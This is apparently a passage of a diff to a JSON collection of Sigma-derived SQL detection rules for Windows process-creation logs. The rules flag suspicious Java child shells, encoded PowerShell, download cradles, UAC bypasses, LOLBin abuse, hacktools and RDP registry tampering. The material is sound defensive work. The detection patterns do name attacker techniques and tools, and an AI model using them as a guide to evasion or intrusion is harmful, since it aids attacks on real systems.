Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Administrative activity" + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": 
"proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", - "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + 
"status": "test", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "SC.EXE Query Execution", + "id": "57712d7a-679c-4a41-a913-87e7175ae429", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "author": "frack113", 
"tags": [ - "attack.defense_evasion", - "attack.t1036.002" + "attack.discovery", + "attack.t1007" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate query of a service by an administrator to get more information such as the state or PID", + "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_sc_query.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", + "status": "experimental", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE 
'%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' 
ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 
'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "System Network Connections Discovery Via Net.EXE", - "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "status": "test", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + 
"attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_network_connections_discovery.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of executionpolicy option to set insecure policies", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Very unlikely" + "Administrator script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR 
CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.defense_evasion", + "attack.t1574" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Set Files as System Files Using Attrib.EXE", + "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' 
ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_attrib_system.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.t1134.004" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE 
'%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": 